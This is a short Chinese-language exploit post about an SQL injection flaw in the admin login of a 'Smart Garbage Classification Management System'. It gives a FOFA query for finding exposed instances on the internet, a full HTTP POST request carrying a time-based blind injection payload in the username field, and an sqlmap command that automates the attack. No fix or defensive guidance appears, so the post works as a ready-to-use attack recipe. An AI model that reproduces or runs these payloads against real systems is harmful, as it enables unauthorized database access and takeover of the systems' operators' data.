# 智能垃圾分類管理系統 SQL注入漏洞
==FOFA==
title="智能垃圾分类管理系统"
==漏洞利用==
發送請求包
POST /ghc_master/data/action.admindata.php HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 96 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://xxx.xxx.xxx.xxx Referer: http://xxx.xxx.xxx.xxx/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Connection: close do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224
Sqlmap:
sqlmap -r sql.txt -p username
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容